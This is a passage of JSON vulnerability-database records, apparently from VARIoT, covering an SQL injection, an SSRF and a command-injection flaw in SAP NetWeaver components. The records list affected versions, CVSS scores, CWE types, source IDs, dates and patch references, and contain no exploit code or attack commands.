"id": "CNVD-2013-15063"
},
{
"db": "BID",
"id": "64232"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"db": "NVD",
"id": "CVE-2013-7094"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
]
},
"id": "VAR-201312-0311",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-15063"
}
],
"trust": 1.07111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-15063"
}
]
},
"last_update_date": "2023-12-18T14:06:13.955000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "SAP NetWeaver \u0027RSDDCVER_COUNT_TAB_COLS\u0027 patch for SQL injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/41624"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15063"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"db": "NVD",
"id": "CVE-2013-7094"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://erpscan.com/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/"
},
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/56061"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1836718"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/64232"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-13-022-sap-netweaver-rsddcver_count_tab_cols-potential-sql-injection/"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89603"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7094"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7094"
},
{
"trust": 0.8,
"url": "http://erpscan.com/press-center/blog/sap-critical-patch-update-november-2013/"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/89603"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15063"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"db": "NVD",
"id": "CVE-2013-7094"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-15063"
},
{
"db": "BID",
"id": "64232"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"db": "NVD",
"id": "CVE-2013-7094"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-16T00:00:00",
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
},
{
"date": "2013-12-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15063"
},
{
"date": "2013-11-29T00:00:00",
"db": "BID",
"id": "64232"
},
{
"date": "2013-12-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"date": "2013-12-13T20:08:40.797000",
"db": "NVD",
"id": "CVE-2013-7094"
},
{
"date": "2013-12-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-16T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15063"
},
{
"date": "2013-12-17T00:17:00",
"db": "BID",
"id": "64232"
},
{
"date": "2013-12-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005538"
},
{
"date": "2018-12-10T19:29:02.653000",
"db": "NVD",
"id": "CVE-2013-7094"
},
{
"date": "2013-12-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of RSDDCVER_COUNT_TAB_COLS In function SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005538"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "IVD",
"id": "9c78f5be-1ef8-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-300"
}
],
"trust": 0.8
}
}
var-201712-0104
Vulnerability from variot
Server Side Request Forgery (SSRF) vulnerability in SAP NetWeaver Knowledge Management Configuration Service, EPBC and EPBC2 from 7.00 to 7.02; KMC-BC 7.30, 7.31, 7.40 and 7.50, that allows an attacker to manipulate the vulnerable application to send crafted requests on behalf of the application. plural SAP The product contains a server-side request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SAP NetWeaver is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0104",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kmc-bc",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.30"
},
{
"model": "kmc-bc",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.31"
},
{
"model": "kmc-bc",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.40"
},
{
"model": "kmc-bc",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver knowledge management configuration service",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "epbc2",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "epbc",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "epbc",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.00"
},
{
"model": "epbc2",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.00"
},
{
"model": "epbc",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.00 to 7.02"
},
{
"model": "epbc2",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.00 to 7.02"
},
{
"model": "netweaver knowledge management configuration service",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.5"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "102149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"db": "NVD",
"id": "CVE-2017-16678"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_knowledge_management_configuration_service:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:epbc2:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.02",
"versionStartIncluding": "7.00",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:epbc:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.02",
"versionStartIncluding": "7.00",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:kmc-bc:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:kmc-bc:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:kmc-bc:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:kmc-bc:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16678"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP",
"sources": [
{
"db": "BID",
"id": "102149"
}
],
"trust": 0.3
},
"cve": "CVE-2017-16678",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-16678",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "LOW",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.2,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "Low",
"baseScore": 4.7,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-16678",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-16678",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201712-422",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"db": "NVD",
"id": "CVE-2017-16678"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Server Side Request Forgery (SSRF) vulnerability in SAP NetWeaver Knowledge Management Configuration Service, EPBC and EPBC2 from 7.00 to 7.02; KMC-BC 7.30, 7.31, 7.40 and 7.50, that allows an attacker to manipulate the vulnerable application to send crafted requests on behalf of the application. plural SAP The product contains a server-side request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SAP NetWeaver is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16678"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"db": "BID",
"id": "102149"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-16678",
"trust": 2.7
},
{
"db": "BID",
"id": "102149",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011520",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201712-422",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "102149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"db": "NVD",
"id": "CVE-2017-16678"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
]
},
"id": "VAR-201712-0104",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T14:01:26.847000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "December 2017 (2457562)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/12/12/sap-security-patch-day-december-2017/"
},
{
"title": "SAP NetWeaver Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=77128"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-918",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"db": "NVD",
"id": "CVE-2017-16678"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://launchpad.support.sap.com/#/notes/2457562"
},
{
"trust": 1.9,
"url": "https://blogs.sap.com/2017/12/12/sap-security-patch-day-december-2017/"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/102149"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16678"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16678"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
}
],
"sources": [
{
"db": "BID",
"id": "102149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"db": "NVD",
"id": "CVE-2017-16678"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "102149"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"db": "NVD",
"id": "CVE-2017-16678"
},
{
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-12T00:00:00",
"db": "BID",
"id": "102149"
},
{
"date": "2018-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"date": "2017-12-12T14:29:00.187000",
"db": "NVD",
"id": "CVE-2017-16678"
},
{
"date": "2017-12-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-19T22:01:00",
"db": "BID",
"id": "102149"
},
{
"date": "2018-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011520"
},
{
"date": "2018-01-02T17:42:20.117000",
"db": "NVD",
"id": "CVE-2017-16678"
},
{
"date": "2020-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural SAP Server-side request forgery vulnerability in the product",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011520"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201712-422"
}
],
"trust": 0.6
}
}
var-201208-0832
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAPHostControl service has remote parameter injection that allows an attacker to execute arbitrary commands in the SAP administrator context through the SOAP management console. The SOAP WEB service listens on port 50013. The authentication mechanism has a security vulnerability. Because the authentication is not fully input, the attacker is allowed to submit malicious parameters to the database script through the WEB service. Any command can be created and run in the SAP administrator context. SAP Netweaver is prone to a remote code-execution vulnerability. This may allow an attacker to take complete control of the system. SAP NetWeaver 7.02 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201208-0832",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.02"
}
],
"sources": [
{
"db": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-4343"
},
{
"db": "BID",
"id": "55084"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Michael Jordon, Context Information Security",
"sources": [
{
"db": "BID",
"id": "55084"
},
{
"db": "CNNVD",
"id": "CNNVD-201210-665"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAPHostControl service has remote parameter injection that allows an attacker to execute arbitrary commands in the SAP administrator context through the SOAP management console. The SOAP WEB service listens on port 50013. The authentication mechanism has a security vulnerability. Because the authentication is not fully input, the attacker is allowed to submit malicious parameters to the database script through the WEB service. Any command can be created and run in the SAP administrator context. SAP Netweaver is prone to a remote code-execution vulnerability. This may allow an attacker to take complete control of the system. \nSAP NetWeaver 7.02 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-4343"
},
{
"db": "BID",
"id": "55084"
},
{
"db": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "55084",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2012-4343",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201210-665",
"trust": 0.6
},
{
"db": "IVD",
"id": "CC225A46-1F5A-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "cc225a46-1f5a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2012-4343"
},
{
"db": "BID",
"id": "55084"
},
{
"db": "CNNVD",
"id": "CNNVD-201210-665"
}
]
},
"id": "VAR-201208-0832",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
